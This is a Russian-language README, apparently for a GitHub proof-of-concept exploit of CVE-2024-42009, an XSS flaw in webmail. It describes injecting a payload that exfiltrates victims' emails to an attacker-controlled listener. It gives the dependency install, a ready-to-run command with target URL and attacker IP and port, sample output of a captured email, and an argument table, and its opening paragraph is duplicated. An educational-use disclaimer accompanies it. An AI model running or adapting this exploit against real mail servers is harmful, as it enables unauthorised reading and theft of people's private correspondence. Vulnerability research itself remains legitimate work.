
Этот Proof of Concept (PoC) демонстрирует эксплойт для CVE-2024-42009, использующий уязвимость межсайтового скриптинга (XSS) для извлечения электронных писем из целевого веб-почтового приложения. Атака внедряет вредоносную полезную нагрузку, которая выводит содержимое писем на прослушиватель, контролируемый злоумышленником.
Этот Proof of Concept (PoC) демонстрирует эксплойт для CVE-2024-42009, использующий уязвимость межсайтового скриптинга (XSS) для извлечения писем из целевого веб-почтового приложения. Атака внедряет вредоносную нагрузку, которая экфильтрует содержимое писем на подконтрольный злоумышленнику слушатель.
pip install requests beautifulsoup4
Запустите скрипт с необходимыми аргументами:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
[*] CVE-2024-42009 PoC: Listening on 192.168.1.100:1337...
[*] Sending payload for UID 1...
[+] Payload sent for UID 1 (Status: 200)
[+] Captured Email Content:
Hello, this is a test email!
Я не претендую на авторство, владение или раскрытие этой уязвимости и всех соответствующих эксплойтов, размещенных в этом репозитории GitHub — все заслуги принадлежат исследователю, который ее обнаружил; я всего лишь создал POC для воспроизведения уязвимости на основе данных из интернета. Этот PoC предназначен только для образовательных и исследовательских целей. Несанкционированное тестирование систем без согласия незаконно. Используйте ответственно!
| Аргумент | Описание |
|---|
-fu, --from-user | Адрес электронной почты отправителя |
-tu, --to-user | Адрес электронной почты получателя |
-u, --target-url | URL целевой веб-почты |
-ip, --server-ip | IP-адрес слушателя атакующего |
-p, --server-port | Порт слушателя (по умолчанию: 1337) |